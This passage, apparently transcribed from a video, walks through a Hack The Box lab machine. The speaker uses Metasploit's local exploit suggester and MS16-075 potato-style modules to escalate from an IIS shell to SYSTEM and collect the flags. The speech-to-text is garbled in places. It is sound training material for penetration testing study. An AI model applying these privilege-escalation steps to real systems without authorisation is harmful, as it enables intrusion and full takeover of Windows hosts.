all of this. We really didn't take notes for a while. Rivesk. We have a shell as IIS at full web. Shell has been upgraded to a Meterpreter session. Local exploit suggester. Okay. And let's just grab everything and then we'll kind of edit it down. Okay, so we need 1 to 13. This take out anything that says can't be validated. Not reliably check. Not exploitable. Not exploitable. Not exploitable. Exception. Not exploitable. Not exploitable. Not exploitable. Blah blah blah. So we're left with 1, 2, 3, 4, 5, 6, 7, 8, 9 possible Privesc vectors. That I'm gonna dip because it's bypass UAC, which I think you need an interactive session for. The ones that reference MS16075, I believe, are related to the hot, rotten, juicy potato vulnerability. And I've already validated, like through my extensive reading through this session earlier, that the privilege required to pull that off is there, and that the OS meets the requirements most likely because it fits the right Windows major build number, like Windows 7. But on the negative side, it doesn't work with x86. So I'm going to take this and try this one first, if everyone is okay with that. Let's go here, use, okay, sessions, -L, so session 4. So let's use this. And let's do show options. Let's set L port to 5555 and let's run. Oh, session, set session 5, because we need an existing session to run. Session 4. So it did identify quite early x86, not x64. Reflectively injecting the exploit DLL and then triggering the exploit. Launching MSI execs to host the DSL. Exploit finish. Wait for exploit completed, but no session was created. Dang. Okay. There is a variation of this. So let's just get, let's say no. But then we've got the juicy version of it. So use this version. Go options. Set. Wait a minute. I think I might have screwed that up. Show options. Yeah, set lhost ton 0. I think we can do global. G set G. Yeah, G set lhost ton 0. No, G set lhost ton 0. No, set G lhost ton 0. Okay, so that should save me typing it over and over again. I did read about global variables the other day. Session 4 is good. Localhost is good. Local port is good. And let's try it again. Let's keep going. Oh, that time we got a session. Very nice. Sessions minus L. Oh no, we're already in Meterpreter. So shell. Who am I? Web root. No, privesc. Okay. Sessions minus L. Okay, weird. Let's try this one. Use this guy. Show options. Yeah, see, this references the CLS ID, which is the DCOM object that it uses to mess around with. Session 4. Let's try that again. Set session 4. Sessions minus L. Good. L host ton 0, L port 4444. Let's do set L port 5555. Run. Hopefully privileged. All right, so now we got a new Meterpreter session. Shell. Hello. Who am I? NT Authority System. Woo! Okay. We have owned the box. Finally. But okay, let's just get the flags done. I'm assuming this is the user flag. Desktop. Duh. Okay, flag number 1. Flag number 1. And administrator. Desktop. Root.txt. And then boom. All right, very nice. Boom box has been owned. Very cool. Right. Now, before we end off this 2.5-hour video, I want to find out how I could have done this without Metasploit, right? So now that we know what the was this one, right? Yes. Okay, so here's where I think I went wrong. Well, here's where I may have gone wrong. Let's go back to our shell here. Exit out of this. Bye-bye. Exit out of that. And let's search exploit potato. Potato news. No. Let's search exploit MS16075. Until M reflection. Yeah, see, the module was only in Metasploit. Oops. So I'm a bit confused. Is this the same as the hot potato. Okay, so yeah, I'm gonna go and have to read about this because this, while we got there in the end, like, is a little bit confusing. Yeah, I'm just not 100% sure whether that is the same issue or a different issue. Now, just to quickly explain, while Hack the Box quite rightly on the the easy kind of boxes and everything else occasionally steers people towards using Metasploit. I do not want to become, in the short term, reliant on Metasploit. I think it's a great tool. I've certainly learnt more about it in the last couple of weeks, but not a full muscle memory yet. So that was why I was kind of like struggling to switch between sessions and background things and everything else, but kind of got there in the end. So there's some reasons why I want to try and avoid using Metasploits. Like, one of them is just the curiosity, right? Like, I want to understand if there's a vulnerability that's being exploited, then I'd rather kind of pick it apart and try a few different ways to achieve exploitation. So, and then the second is that I don't want to be reliant on Metasploit through the OSCP exam, and I'm going to put out a video at some point explaining some further thinking about that. But anyway, look, we got there in the end. We have owned the box devil. So I think we might wrap it there. It's been a lot of fun. If you stuck around to the end of this video, thanks very much for watching me bumble my way through that. And yeah, thanks very much. Have a great morning, a great evening, afternoon, nighttime, whatever time it is for you. And I'll see you in the next video. Bye-bye.